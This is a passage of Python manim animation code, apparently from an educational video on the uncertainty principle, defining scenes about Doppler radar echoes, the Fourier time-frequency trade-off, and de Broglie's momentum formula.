doppler_shift_words.set_color(YELLOW)\n doppler_shift_words.scale(0.75)\n displayed_doppler_shift.next_to(brace, UP, buff = SMALL_BUFF)\n actual_doppler_shift.move_to(pulse_graph.peak_point)\n actual_doppler_shift.align_to(displayed_doppler_shift)\n\n self.play(\n Animation(pulse_graph),\n self.teacher.change, \"raise_right_hand\", \n run_time = 1\n )\n self.play(\n ShowCreation(shift_graph),\n FadeIn(brace),\n Write(displayed_doppler_shift, run_time = 1),\n self.change_students(*3*[\"sassy\"]),\n )\n self.play(\n UpdateFromAlphaFunc(\n shift_graph, \n lambda g, a : Transform(\n g, self.get_spike_graph(\n interpolate(shift_x, pulse_x+0.01, a),\n ).match_style(shift_graph)\n ).update(1),\n ),\n UpdateFromFunc(\n brace,\n lambda b : b.match_width(\n peak_points, stretch = True\n ).next_to(peak_points, UP, SMALL_BUFF)\n ),\n Transform(\n displayed_doppler_shift, actual_doppler_shift,\n rate_func = squish_rate_func(smooth, 0.3, 0.6)\n ),\n run_time = 3\n )\n self.wait(2)\n\n everything = VGroup(\n title,\n axes, pulse_graph, shift_graph,\n brace, displayed_doppler_shift\n )\n rect = SurroundingRectangle(everything, color = WHITE)\n everything.add(rect)\n\n self.teacher_says(\n \"I'll ignore certain \\\\\\\\ nuances for now.\",\n target_mode = \"shruggie\",\n added_anims = [\n everything.scale, 0.4,\n everything.to_corner, UP+LEFT,\n UpdateFromAlphaFunc(\n rect, lambda m, a : m.set_stroke(width = 2*a)\n )\n ],\n )\n self.play_student_changes(*3*[\"hesitant\"])\n self.wait(2)\n\n\n\n\n def get_spike_graph(self, x, color = RED, **kwargs):\n graph = self.axes.get_graph(\n lambda t : np.exp(-10*(t-x)**2)*np.cos(10*(t-x)),\n color = color,\n **kwargs\n )\n graph.peak_point = VectorizedPoint(self.axes.input_to_graph_point(x, graph))\n graph.add(graph.peak_point)\n return graph\n\nclass TimeAndFrequencyGivePositionAndVelocity(IntroduceDopplerRadar):\n def construct(self):\n x = 7\n freq = 25\n\n axes = self.axes = Axes(\n x_min = 0, x_max = 10,\n y_min = -2, y_max = 2,\n )\n axes.center()\n title = OldTexText(\"Echo signal\")\n title.next_to(axes.y_axis, UP)\n axes.add(title)\n axes.to_edge(UP)\n graph = self.get_frequency_pulse_graph(x = x, freq = freq)\n graph.background_image_file = \"blue_yellow_gradient\"\n\n arrow = Arrow(\n axes.coords_to_point(0, -1.5),\n axes.coords_to_point(x, -1.5),\n color = WHITE,\n buff = SMALL_BUFF,\n )\n time = OldTexText(\"Time\")\n time.next_to(arrow, DOWN, SMALL_BUFF)\n\n delta_x = 0.7\n brace = Brace(\n Line(\n axes.coords_to_point(x-delta_x, 1), \n axes.coords_to_point(x+delta_x, 1)\n ),\n UP\n )\n frequency = OldTexText(\"Frequency\")\n frequency.set_color(YELLOW)\n frequency.next_to(brace, UP, SMALL_BUFF)\n\n time_updown_arrow = OldTex(\"\\\\Updownarrow\")\n time_updown_arrow.next_to(time, DOWN, SMALL_BUFF)\n freq_updown_arrow = time_updown_arrow.copy()\n freq_updown_arrow.next_to(frequency, UP, SMALL_BUFF)\n distance = OldTexText(\"Distance\")\n distance.next_to(time_updown_arrow, DOWN, SMALL_BUFF)\n velocity = OldTexText(\"Velocity\")\n velocity.next_to(freq_updown_arrow, UP, SMALL_BUFF)\n VGroup(freq_updown_arrow, velocity).match_style(frequency)\n\n self.add(axes)\n self.play(ShowCreation(graph))\n self.play(\n GrowArrow(arrow),\n LaggedStartMap(FadeIn, time, run_time = 1)\n )\n self.play(\n GrowFromCenter(brace),\n LaggedStartMap(FadeIn, frequency, run_time = 1)\n )\n self.wait()\n self.play(\n GrowFromPoint(time_updown_arrow, time_updown_arrow.get_top()),\n ReplacementTransform(\n time.copy().fade(1), \n distance\n )\n )\n self.play(\n GrowFromPoint(freq_updown_arrow, freq_updown_arrow.get_top()),\n ReplacementTransform(\n frequency.copy().fade(1), \n velocity\n )\n )\n self.wait()\n\nclass RadarOperatorUncertainty(Scene):\n def construct(self):\n dish = RadarDish()\n dish.scale(3)\n dish.move_to(4*RIGHT + 2*DOWN)\n dish_words = OldTexText(\"3b1b industrial \\\\\\\\ enterprises\")\n dish_words.scale(0.25)\n dish_words.set_stroke(BLACK, 0.5)\n dish_words.set_color(BLACK)\n dish_words.move_to(dish, DOWN)\n dish_words.shift(SMALL_BUFF*(UP+2*LEFT))\n dish.add(dish_words)\n randy = Randolph()\n randy.next_to(dish, LEFT, aligned_edge = DOWN)\n bubble = randy.get_bubble(\n width = 7,\n height = 4,\n )\n\n echo_object = Square()\n echo_object.move_to(dish)\n echo_object.shift(FRAME_X_RADIUS*RIGHT)\n pulse = RadarPulse(dish, echo_object, speed = 6)\n\n plane = Plane().scale(0.5)\n plane.move_to(bubble.get_bubble_center()+LEFT)\n plane_cloud = ProbabalisticMobjectCloud(\n plane, \n fill_opacity = 0.3,\n n_copies = 10,\n )\n plane_gdw = plane_cloud.gaussian_distribution_wrapper\n\n vector_cloud = ProbabalisticVectorCloud(\n center_func = plane_gdw.get_center,\n )\n vector_gdw = vector_cloud.gaussian_distribution_wrapper\n vector_gdw.scale(0.05)\n vector_gdw.move_to(plane_gdw)\n vector_gdw.shift(2*RIGHT)\n\n self.add(randy, dish, bubble, plane_cloud, pulse)\n self.play(randy.change, \"confused\")\n self.wait(3)\n self.add(vector_cloud)\n for i in range(3):\n for plane_factor, vector_factor, freq in (0.05, 10, 0.01), (20, 0.1, 0.1):\n pulse.internal_time = 0\n pulse.frequency = freq\n self.play(\n randy.change, \"pondering\", plane,\n plane_gdw.scale, plane_factor,\n vector_gdw.scale, vector_factor,\n )\n self.wait(2)\n\nclass AmbiguityInLongEchos(IntroduceDopplerRadar, PiCreatureScene):\n CONFIG = {\n \"object_x_coords\" : [7, 4, 6, 9, 8],\n \"frequency_spread_factor\" : 200,\n \"n_pulse_singletons\" : 16,\n \"pulse_frequency\" : 0.025,\n }\n def construct(self):\n self.setup_axes()\n self.setup_objects()\n self.send_long_pulse_single_echo()\n self.introduce_multiple_objects()\n self.use_short_pulse()\n self.fourier_transform_of_one_pulse()\n self.show_echos_of_moving_objects()\n self.overlapping_frequenies_of_various_objects()\n self.echos_of_long_pure_signal_in_frequency_space()\n self.concentrated_fourier_requires_long_time()\n\n def setup_axes(self):\n axes = self.axes = Axes(\n x_min = 0, x_max = 10,\n y_min = -1.5, y_max = 1.5,\n )\n time_label = OldTexText(\"Time\")\n time_label.next_to(axes.x_axis.get_right(), UP)\n axes.add(time_label)\n axes.center()\n axes.shift(DOWN)\n self.add(axes)\n\n dish = self.dish = RadarDish()\n dish.move_to(axes, LEFT)\n dish.to_edge(UP, buff = LARGE_BUFF)\n self.add(dish)\n\n def setup_objects(self):\n objects = self.objects = VGroup(\n Plane().flip(),\n SVGMobject(\n file_name = \"blimp\", \n color = BLUE_C,\n height = 0.5,\n ),\n SVGMobject(\n file_name = \"biplane\", \n color = RED_D,\n height = 0.5,\n ),\n SVGMobject(\n file_name = \"helicopter\", \n color = GREY_B,\n height = 0.5,\n ).rotate(-TAU/24),\n FalconHeavy(),\n )\n y_shifts = [0.25, 0, 0.5, 0.25, -0.5]\n for x, y, obj in zip(self.object_x_coords, y_shifts, objects):\n obj.move_to(self.axes.coords_to_point(x, 0))\n obj.align_to(self.dish)\n obj.shift(y*UP)\n\n self.object_velocities = [\n 0.7*LEFT,\n 0.1*RIGHT,\n 0.4*LEFT,\n 0.4*RIGHT,\n 0.5*UP,\n ]\n\n def send_long_pulse_single_echo(self):\n x = self.object_x_coords[0]\n plane = self.objects[0]\n self.add(plane)\n randy = self.pi_creature\n self.remove(randy)\n\n pulse_graph = self.get_frequency_pulse_graph(x)\n pulse_graph.background_image_file = \"blue_yellow_gradient\"\n\n pulse = self.get_pulse(self.dish, plane)\n\n brace = Brace(\n Line(\n self.axes.coords_to_point(x-1, 1),\n self.axes.coords_to_point(x+1, 1),\n ), UP\n )\n words = brace.get_text(\"Spread over time\")\n\n self.add(pulse)\n self.wait()\n squished_rate_func = squish_rate_func(smooth, 0.6, 0.9)\n self.play(\n ShowCreation(pulse_graph, rate_func=linear),\n GrowFromCenter(brace, rate_func = squished_rate_func),\n Write(words, rate_func = squished_rate_func),\n run_time = 3,\n )\n self.remove(pulse)\n self.play(FadeIn(randy))\n self.play(PiCreatureBubbleIntroduction(\n randy, \"Who cares?\",\n bubble_type = ThoughtBubble,\n bubble_config = {\n \"direction\" : LEFT,\n \"width\" : 2,\n \"height\": 1.5,\n },\n target_mode = \"maybe\",\n look_at = brace,\n ))\n self.play(Blink(randy))\n self.play(LaggedStartMap(\n FadeOut, VGroup(\n randy.bubble, randy.bubble.content, \n brace, words,\n )\n ))\n\n self.curr_graph = pulse_graph\n\n def introduce_multiple_objects(self):\n objects = self.objects\n x_coords = self.object_x_coords\n curr_graph = self.curr_graph\n randy = self.pi_creature\n\n graphs = VGroup(*[\n self.get_frequency_pulse_graph(x)\n for x in x_coords\n ])\n graphs.set_color_by_gradient(BLUE, YELLOW)\n sum_graph = self.axes.get_graph(\n lambda t : sum([\n graph.underlying_function(t)\n for graph in graphs\n ]),\n num_graph_points = 1000\n )\n\n noise_function = lambda t : np.sum([\n 0.5*np.sin(f*t)/f \n for f in (2, 3, 5, 7, 11, 13)\n ])\n noisy_graph = self.axes.get_graph(\n lambda t : sum_graph.underlying_function(t)*(1+noise_function(t)),\n num_graph_points = 1000\n )\n for graph in sum_graph, noisy_graph:\n graph.background_image_file = \"blue_yellow_gradient\"\n\n pulses = self.get_pulses()\n\n self.play(\n LaggedStartMap(GrowFromCenter, objects[1:]),\n FadeOut(curr_graph),\n randy.change, \"pondering\"\n )\n self.add(*pulses)\n self.wait(0.5)\n self.play(\n ShowCreation(\n sum_graph,\n rate_func=linear,\n run_time = 3.5,\n ),\n randy.change, \"confused\"\n )\n self.remove(*pulses)\n self.play(randy.change, \"pondering\")\n self.play(Transform(\n sum_graph, noisy_graph,\n rate_func = lambda t : wiggle(t, 4),\n run_time = 3\n ))\n self.wait(2)\n\n self.curr_graph = sum_graph\n\n def use_short_pulse(self):\n curr_graph = self.curr_graph\n objects = self.objects\n x_coords = self.object_x_coords\n randy = self.pi_creature\n\n self.frequency_spread_factor = 10\n self.n_pulse_singletons = 4\n self.pulse_frequency = 0.015\n\n graphs = VGroup(*[\n self.get_frequency_pulse_graph(x)\n for x in x_coords\n ])\n sum_graph = self.axes.get_graph(\n lambda t : sum([\n graph.underlying_function(t)\n for graph in graphs\n ]),\n num_graph_points = 1000\n )\n sum_graph.background_image_file = \"blue_yellow_gradient\"\n\n pulses = self.get_pulses()\n\n self.play(FadeOut(curr_graph))\n self.add(*pulses)\n self.wait(0.5)\n self.play(\n ShowCreation(\n sum_graph,\n rate_func=linear,\n run_time = 3.5,\n ),\n randy.change, \"happy\"\n )\n self.wait()\n\n self.curr_graph = sum_graph\n self.first_echo_graph = graphs[0]\n self.first_echo_graph.set_color(YELLOW)\n\n def fourier_transform_of_one_pulse(self):\n frequency_axes = Axes(\n x_min = 0, x_max = 20,\n x_axis_config = {\n \"unit_size\" : 0.5, \n \"tick_frequency\" : 2, \n },\n y_min = -.01, y_max = .01,\n y_axis_config = {\n \"unit_size\" : 110,\n \"tick_frequency\" : 0.006\n }\n )\n frequency_label = OldTexText(\"Frequency\")\n frequency_label.next_to(frequency_axes.x_axis.get_right(), UP)\n frequency_axes.add(frequency_label)\n first_echo_graph = self.first_echo_graph\n\n self.play(\n ApplyMethod(\n VGroup(self.axes, first_echo_graph).to_edge, UP,\n {\"buff\" : SMALL_BUFF},\n rate_func = squish_rate_func(smooth, 0.5, 1)\n ),\n LaggedStartMap(FadeOut, self.objects),\n LaggedStartMap(FadeOut, VGroup(\n self.curr_graph, self.dish, self.pi_creature\n )),\n run_time = 2\n )\n\n #\n frequency_axes.next_to(self.axes, DOWN, LARGE_BUFF, LEFT)\n fourier_graph = get_fourier_graph(\n frequency_axes, first_echo_graph.underlying_function,\n t_min = 0, t_max = 25,\n complex_to_real_func = np.abs,\n )\n fourier_graph.save_state()\n fourier_graph.move_to(first_echo_graph)\n h_vect = 4*RIGHT\n fourier_graph.shift(h_vect)\n fourier_graph.fade(1)\n\n f = 8\n v_line = DashedLine(\n frequency_axes.coords_to_point(f, 0),\n frequency_axes.coords_to_point(f, frequency_axes.y_max),\n )\n v_lines = VGroup(\n v_line.copy().shift(2*LEFT),\n v_line.copy().shift(2*RIGHT),\n )\n rect = Rectangle(stroke_width = 0, fill_color = YELLOW, fill_opacity = 0.25)\n rect.replace(v_lines, stretch = True)\n rect.save_state()\n rect.stretch(0, 0)\n\n self.play(Write(frequency_axes, run_time = 1))\n self.play(\n ApplyFunction(\n lambda m : m.move_to(fourier_graph.saved_state).shift(-h_vect).fade(1),\n first_echo_graph.copy(),\n remover = True,\n ),\n fourier_graph.restore\n )\n self.wait()\n self.play(ShowCreation(v_line))\n self.play(\n ReplacementTransform(VGroup(v_line), v_lines),\n rect.restore\n )\n self.wait()\n self.play(FadeOut(v_lines), FadeOut(rect))\n\n self.frequency_axes = frequency_axes\n self.fourier_graph = fourier_graph\n\n def show_echos_of_moving_objects(self):\n objects = self.objects\n objects.save_state()\n object_velocities = self.object_velocities\n\n movements = self.object_movements = [\n always_shift(\n obj, \n direction = v/get_norm(v),\n rate = get_norm(v)\n )\n for v, obj in zip(object_velocities, objects)\n ]\n pulses = self.get_pulses()\n continual_anims = pulses+movements\n \n self.play(\n FadeOut(self.axes),\n FadeOut(self.first_echo_graph),\n LaggedStartMap(FadeIn, objects),\n FadeIn(self.dish)\n )\n self.add(*continual_anims)\n self.wait(4)\n self.play(*[\n UpdateFromAlphaFunc(\n obj, \n lambda m, a : m.set_fill(opacity = 1-a),\n )\n for obj in objects\n ])\n self.remove(*continual_anims)\n self.wait()\n\n def overlapping_frequenies_of_various_objects(self):\n frequency_axes = self.frequency_axes\n fourier_graph = self.fourier_graph\n shifted_graphs = self.get_shifted_frequency_graphs(fourier_graph)\n color = fourier_graph.get_color()\n shifted_graphs.set_color_by_gradient(\n average_color(color, WHITE), \n color,\n average_color(color, BLACK),\n )\n sum_graph = self.get_sum_graph(frequency_axes, shifted_graphs)\n sum_graph.match_style(fourier_graph)\n\n shifted_graphs.save_state()\n\n self.play(ReplacementTransform(\n VGroup(fourier_graph), shifted_graphs,\n lag_ratio = 0.5,\n run_time = 2\n ))\n self.wait()\n self.play(\n shifted_graphs.arrange, DOWN,\n shifted_graphs.move_to, fourier_graph, DOWN,\n )\n self.wait()\n self.play(shifted_graphs.restore),\n self.play(ReplacementTransform(\n shifted_graphs, VGroup(sum_graph),\n ))\n self.wait()\n\n self.curr_fourier_graph = sum_graph\n\n def echos_of_long_pure_signal_in_frequency_space(self):\n curr_fourier_graph = self.curr_fourier_graph\n f_max = self.frequency_axes.y_max\n new_fourier_graph = self.frequency_axes.get_graph(\n lambda x : f_max * np.exp(-100*(x-8)**2),\n num_graph_points = 1000,\n )\n new_fourier_graph.set_color(PINK)\n\n self.play(\n FadeOut(curr_fourier_graph),\n FadeIn(new_fourier_graph),\n )\n self.fourier_graph = new_fourier_graph\n self.overlapping_frequenies_of_various_objects()\n\n def concentrated_fourier_requires_long_time(self):\n objects = self.objects\n objects.restore()\n object_movements = self.object_movements\n self.n_pulse_singletons = 32\n pulses = self.get_pulses()\n randy = self.pi_creature\n\n continual_anims = object_movements+pulses\n self.play(FadeIn(randy))\n self.add(*continual_anims)\n self.play(randy.change, \"angry\", *[\n UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = a))\n for obj in objects\n ])\n self.play(Blink(randy))\n self.wait(2)\n self.play(Blink(randy))\n self.wait()\n self.play(randy.change, \"plain\", *[\n UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = 1-a))\n for obj in objects\n ])\n self.wait()\n\n\n ###\n\n def get_frequency_pulse_graph(self, x, freq = 25, **kwargs):\n graph = IntroduceDopplerRadar.get_frequency_pulse_graph(\n self, x, freq, **kwargs\n )\n return graph\n\n def get_pulse(self, dish, echo_object):\n return RadarPulse(\n dish, echo_object, \n n_pulse_singletons = self.n_pulse_singletons,\n frequency = 0.025,\n speed = 5.0,\n )\n\n def get_pulses(self):\n return [\n self.get_pulse(\n self.dish.copy().shift(0.01*obj.get_center()[0]),\n obj\n )\n for obj in self.objects\n ]\n\n def create_pi_creature(self):\n randy = Randolph()\n randy.scale(0.5).flip()\n randy.to_edge(RIGHT, buff = 1.7).shift(0.5*UP)\n return randy\n\n def get_shifted_frequency_graphs(self, fourier_graph):\n frequency_axes = self.frequency_axes\n def get_func(v):\n return lambda f : fourier_graph.underlying_function(np.clip(\n f-5*v[0], \n frequency_axes.x_min,\n frequency_axes.x_max,\n ))\n def get_graph(func):\n return frequency_axes.get_graph(func)\n shifted_graphs = VGroup(*list(map(\n get_graph, list(map(get_func, self.object_velocities))\n )))\n shifted_graphs.match_style(fourier_graph)\n return shifted_graphs\n\n def get_sum_graph(self, axes, graphs):\n def get_func(graph):\n return graph.underlying_function\n funcs = list(map(get_func, graphs))\n return axes.get_graph(\n lambda t : sum([func(t) for func in funcs]),\n )\n\nclass SummarizeFourierTradeoffForDoppler(Scene):\n def construct(self):\n time_axes = Axes(\n x_min = 0, x_max = 12,\n y_min = -0.5, y_max = 1,\n )\n time_axes.center().to_edge(UP, buff = LARGE_BUFF)\n frequency_axes = time_axes.copy()\n frequency_axes.next_to(time_axes, DOWN, buff = 2)\n time_label = OldTexText(\"Time\")\n frequency_label = OldTexText(\"Frequency\")\n for label, axes in (time_label, time_axes), (frequency_label, frequency_axes):\n label.next_to(axes.get_right(), UP, SMALL_BUFF)\n axes.add(label)\n frequency_label.shift_onto_screen()\n title = OldTexText(\"Fourier Trade-off\")\n title.next_to(time_axes, DOWN)\n self.add(title)\n\n\n #Position determines log of scale value for exponentials\n a_mob = VectorizedPoint()\n x_values = [3, 5, 6, 7, 8]\n v_values = [5, 5.5, 5.75, 6.5, 7]\n def get_top_graphs():\n a = np.exp(a_mob.get_center()[0])\n graphs = VGroup(*[\n time_axes.get_graph(lambda t : np.exp(-5*a*(t-x)**2))\n for x in x_values\n ])\n graphs.set_color(WHITE)\n graphs.color_using_background_image(\"blue_yellow_gradient\")\n return graphs\n def get_bottom_graphs():\n a = np.exp(a_mob.get_center()[0])\n graphs = VGroup(*[\n frequency_axes.get_graph(lambda t : np.exp(-(5./a)*(t-v)**2))\n for v in v_values\n ])\n graphs.set_color(RED)\n return graphs\n\n top_graphs = get_top_graphs()\n bottom_graphs = get_bottom_graphs()\n update_top_graphs = Mobject.add_updater(\n top_graphs, \n lambda g : Transform(g, get_top_graphs()).update(1)\n )\n update_bottom_graphs = Mobject.add_updater(\n bottom_graphs, \n lambda g : Transform(g, get_bottom_graphs()).update(1)\n )\n\n self.add(time_axes, frequency_axes)\n self.add(update_top_graphs, update_bottom_graphs)\n\n shift_vect = 2*RIGHT\n for s in 1, -2, 1:\n self.play(a_mob.shift, s*shift_vect, run_time = 3)\n\nclass MentionUncertaintyPrincipleCopy(MentionUncertaintyPrinciple):\n pass\n\nclass IntroduceDeBroglie(Scene):\n CONFIG = {\n \"default_wave_frequency\" : 1,\n \"wave_colors\" : [BLUE_D, YELLOW],\n \"dispersion_factor\" : 1,\n \"amplitude\" : 1,\n }\n def construct(self):\n text_scale_val = 0.8,\n\n #Overlay real tower in video editor\n eiffel_tower = Line(3*DOWN, 3*UP, stroke_width = 0)\n picture = ImageMobject(\"de_Broglie\")\n picture.set_height(4)\n picture.to_corner(UP+LEFT)\n name = OldTexText(\"Louis de Broglie\")\n name.next_to(picture, DOWN)\n\n picture.save_state()\n picture.scale(0)\n picture.move_to(eiffel_tower.get_top())\n\n\n broadcasts = [\n Broadcast(\n eiffel_tower.get_top(),\n big_radius = 10,\n n_circles = 10,\n lag_ratio = 0.9,\n run_time = 7,\n rate_func = squish_rate_func(smooth, a, a+0.3),\n color = WHITE,\n )\n for a in np.linspace(0, 0.7, 3)\n ]\n\n self.play(*broadcasts)\n self.play(picture.restore)\n self.play(Write(name))\n self.wait()\n\n #Time line\n time_line = NumberLine(\n x_min = 1900,\n x_max = 1935,\n tick_frequency = 1,\n numbers_with_elongated_ticks = list(range(1900, 1941, 10)),\n color = BLUE_D\n )\n time_line.stretch_to_fit_width(FRAME_WIDTH - picture.get_width() - 2)\n time_line.add_numbers(*time_line.numbers_with_elongated_ticks)\n time_line.next_to(picture, RIGHT, MED_LARGE_BUFF, DOWN)\n\n year_to_words = {\n 1914 : \"Wold War I begins\",\n 1915 : \"Einstein field equations\",\n 1916 : \"Lewis dot formulas\",\n 1917 : \"Not a lot of physics...because war\",\n 1918 : \"S'more Rutherford badassery\",\n 1919 : \"Eddington confirms general relativity predictions\",\n 1920 : \"World is generally stoked on general relativity\",\n 1921 : \"Einstein gets long overdue Nobel prize\",\n 1922 : \"Stern-Gerlach Experiment\",\n 1923 : \"Compton scattering observed\",\n 1924 : \"de Broglie's thesis\"\n }\n arrow = Vector(DOWN, color = WHITE)\n arrow.next_to(time_line.number_to_point(1914), UP)\n words = OldTexText(year_to_words[1914])\n words.scale(text_scale_val)\n date = Integer(1914)\n date.next_to(arrow, UP, LARGE_BUFF)\n\n def get_year(alpha = 0):\n return int(time_line.point_to_number(arrow.get_end()))\n\n def update_words(words):\n text = year_to_words.get(get_year(), \"Hi there\")\n if text not in words.get_tex():\n words.__init__(text)\n words.scale(text_scale_val)\n words.move_to(interpolate(\n arrow.get_top(), date.get_bottom(), 0.5\n ))\n update_words(words)\n self.play(\n FadeIn(time_line),\n GrowArrow(arrow),\n Write(words),\n Write(date),\n run_time = 1\n )\n self.wait()\n self.play(\n arrow.next_to, time_line.number_to_point(1924), UP,\n ChangingDecimal(\n date, get_year,\n position_update_func = lambda m : m.next_to(arrow, UP, LARGE_BUFF)\n ),\n UpdateFromFunc(words, update_words),\n run_time = 3,\n )\n self.wait()\n\n #Transform time_line\n line = time_line\n self.play(\n FadeOut(time_line.numbers),\n VGroup(arrow, words, date).shift, MED_LARGE_BUFF*UP,\n *[\n ApplyFunction(\n lambda m : m.rotate(TAU/4).set_stroke(width = 0),\n mob,\n remover = True\n )\n for mob in time_line.tick_marks\n ]\n )\n\n #Wave function\n particle = VectorizedPoint()\n axes = Axes(x_min = -1, x_max = 10)\n axes.match_width(line)\n axes.shift(line.get_center() - axes.x_axis.get_center())\n im_line = line.copy()\n im_line.set_color(YELLOW)\n wave_update_animation = self.get_wave_update_animation(\n axes, particle, line, im_line\n )\n\n for x in range(3):\n particle.move_to(axes.coords_to_point(-10, 0))\n self.play(\n ApplyMethod(\n particle.move_to, axes.coords_to_point(22, 0),\n rate_func=linear\n ),\n wave_update_animation,\n run_time = 3\n )\n self.wait()\n\n ###\n def get_wave_update_animation(self, axes, particle, re_line = None, im_line = None):\n line = Line(\n axes.x_axis.get_left(),\n axes.x_axis.get_right(),\n )\n if re_line is None:\n re_line = line.copy()\n re_line.set_color(self.wave_colors[0])\n if im_line is None:\n im_line = line.copy()\n im_line.set_color(self.wave_colors[1])\n lines = VGroup(im_line, re_line)\n def update_lines(lines):\n waves = self.get_wave_pair(axes, particle)\n for line, wave in zip(lines, waves):\n wave.match_style(line)\n Transform(line, wave).update(1)\n return UpdateFromFunc(lines, update_lines)\n\n def get_wave(\n self, axes, particle, \n complex_to_real_func = lambda z : z.real,\n freq = None, \n **kwargs):\n freq = freq or self.default_wave_frequency\n k0 = 1./freq\n t0 = axes.x_axis.point_to_number(particle.get_center())\n def func(x):\n dispersion = fdiv(1., self.dispersion_factor)*(np.sqrt(1./(1+t0**2)))\n wave_part = complex_to_real_func(np.exp(\n complex(0, TAU*freq*(x-dispersion))\n ))\n bell_part = np.exp(-dispersion*(x-t0)**2)\n amplitude = self.amplitude\n return amplitude*wave_part*bell_part\n graph = axes.get_graph(func)\n return graph\n\n def get_wave_pair(self, axes, particle, colors = None, **kwargs):\n if colors is None and \"color\" not in kwargs:\n colors = self.wave_colors\n return VGroup(*[\n self.get_wave(\n axes, particle, \n C_to_R, color = color, \n **kwargs\n )\n for C_to_R, color in zip(\n [lambda z : z.imag, lambda z : z.real], \n colors\n )\n ])\n\nclass ShowMomentumFormula(IntroduceDeBroglie, TeacherStudentsScene):\n CONFIG = {\n \"default_wave_frequency\" : 2,\n \"dispersion_factor\" : 0.25,\n \"p_color\" : BLUE,\n \"xi_color\" : YELLOW,\n \"amplitude\" : 0.5,\n }\n def construct(self):\n self.introduce_formula()\n self.react_to_claim()\n\n def introduce_formula(self):\n formula = p, eq, h, xi = OldTex(\"p\", \"=\", \"h\", \"\\\\xi\")\n formula.move_to(ORIGIN)\n formula.scale(1.5)\n\n word_shift_val = 1.75\n p_words = OldTexText(\"Momentum\")\n p_words.next_to(p, UP, LARGE_BUFF).shift(word_shift_val*LEFT)\n p_arrow = Arrow(\n p_words.get_bottom(), p.get_corner(UP+LEFT),\n buff = SMALL_BUFF\n )\n added_p_words = OldTexText(\"(Classically $m \\\\times v$)\")\n added_p_words.move_to(p_words, DOWN)\n VGroup(p, p_words, added_p_words, p_arrow).set_color(self.p_color)\n\n xi_words = OldTexText(\"Spatial frequency\")\n added_xi_words = OldTexText(\"(cycles per unit \\\\emph{distance})\")\n xi_words.next_to(xi, UP, LARGE_BUFF).shift(word_shift_val*RIGHT)\n xi_words.align_to(p_words)\n xi_arrow = Arrow(\n xi_words.get_bottom(), xi.get_corner(UP+RIGHT), \n buff = SMALL_BUFF\n )\n added_xi_words.move_to(xi_words, DOWN)\n added_xi_words.align_to(added_p_words, DOWN)\n VGroup(xi, xi_words, added_xi_words, xi_arrow).set_color(self.xi_color)\n\n axes = Axes(\n x_min = 0, x_max = FRAME_WIDTH,\n y_min = -1, y_max = 1,\n )\n axes.center().to_edge(UP, buff = -0.5)\n # axes.next_to(formula, RIGHT)\n particle = VectorizedPoint()\n wave_update_animation = self.get_wave_update_animation(axes, particle)\n wave = wave_update_animation.mobject\n wave[0].set_stroke(width = 0)\n particle.next_to(wave, LEFT, buff = 2)\n wave_propagation = AnimationGroup(\n ApplyMethod(particle.move_to, axes.coords_to_point(30, 0)),\n wave_update_animation,\n run_time = 4,\n rate_func=linear,\n )\n stopped_wave_propagation = AnimationGroup(\n ApplyMethod(particle.move_to, xi_words),\n wave_update_animation,\n run_time = 3,\n rate_func=linear,\n )\n n_v_lines = 10\n v_lines = VGroup(*[\n DashedLine(UP, DOWN)\n for x in range(n_v_lines)\n ])\n v_lines.match_color(xi)\n v_lines.arrange(\n RIGHT,\n buff = float(axes.x_axis.unit_size)/self.default_wave_frequency\n )\n v_lines.move_to(stopped_wave_propagation.sub_anims[0].target_mobject)\n v_lines.align_to(wave)\n v_lines.shift(0.125*RIGHT)\n \n self.add(formula, wave)\n self.play(\n self.teacher.change, \"raise_right_hand\", \n GrowArrow(p_arrow),\n Succession(\n Write, p_words,\n ApplyMethod, p_words.next_to, added_p_words, UP,\n ),\n FadeIn(\n added_p_words,\n rate_func = squish_rate_func(smooth, 0.5, 1),\n run_time = 2,\n ),\n wave_propagation\n )\n self.play(\n Write(xi_words),\n GrowArrow(xi_arrow),\n self.change_students(\"confused\", \"erm\", \"sassy\"),\n stopped_wave_propagation\n )\n self.play(\n FadeIn(added_xi_words),\n xi_words.next_to, added_xi_words, UP,\n )\n self.play(\n LaggedStartMap(ShowCreation, v_lines),\n self.change_students(*[\"pondering\"]*3)\n )\n self.play(LaggedStartMap(FadeOut, v_lines))\n self.wait()\n\n self.formula_labels = VGroup(\n p_words, p_arrow, added_p_words,\n xi_words, xi_arrow, added_xi_words, \n ) \n self.set_variables_as_attrs(wave, wave_propagation, formula)\n\n def react_to_claim(self):\n formula_labels = self.formula_labels\n full_formula = VGroup(self.formula, formula_labels)\n full_formula.save_state()\n wave_propagation = self.wave_propagation\n\n student = self.students[2]\n self.student_says(\n \"Hang on...\",\n bubble_config = {\"height\" : 2, \"width\" : 2, \"direction\" : LEFT},\n target_mode = \"sassy\",\n index = 2,\n added_anims = [self.teacher.change, \"plain\"]\n )\n student.bubble.add(student.bubble.content)\n self.wait()\n kwargs = {\n \"path_arc\" : TAU/4,\n \"lag_ratio\" : 0.5,\n \"lag_ratio\" : 0.7,\n \"run_time\" : 1.5,\n }\n self.play(\n full_formula.scale, 0,\n full_formula.move_to, student.eyes.get_bottom()+SMALL_BUFF*DOWN,\n Animation(student.bubble),\n **kwargs\n )\n self.play(full_formula.restore, Animation(student.bubble), **kwargs)\n wave_propagation.update_config(\n rate_func = lambda a : interpolate(0.35, 1, a)\n )\n self.play(\n wave_propagation, \n RemovePiCreatureBubble(student, target_mode = \"confused\"),\n )\n wave_propagation.update_config(rate_func = lambda t : t)\n self.student_says(\n \"Physics is \\\\\\\\ just weird\",\n bubble_config = {\"height\" : 2.5, \"width\" : 3},\n target_mode = \"shruggie\",\n index = 0,\n added_anims = [ApplyMethod(full_formula.shift, UP)]\n )\n self.wait()\n self.play(\n wave_propagation,\n ApplyMethod(full_formula.shift, DOWN),\n FadeOut(self.students[0].bubble),\n FadeOut(self.students[0].bubble.content),\n self.change_students(*3*[\"pondering\"]),\n self.teacher.change, \"pondering\",\n )\n self.play(wave_propagation)\n\nclass AskPhysicists(PiCreatureScene):\n def construct(self):\n morty, physy1, physy2, physy3 = self.pi_creatures\n formula = OldTex(\"p\", \"=\", \"h\", \"\\\\xi\")\n formula.set_color_by_tex_to_color_map({\n \"p\" : BLUE,\n \"\\\\xi\" : YELLOW,\n })\n formula.scale(1.5)\n\n formula.to_edge(UP)\n formula.save_state()\n formula.shift(DOWN)\n formula.fade(1)\n self.play(formula.restore)\n self.pi_creature_says(\n morty, \"So...why?\",\n target_mode = \"maybe\"\n )\n self.wait(2)\n 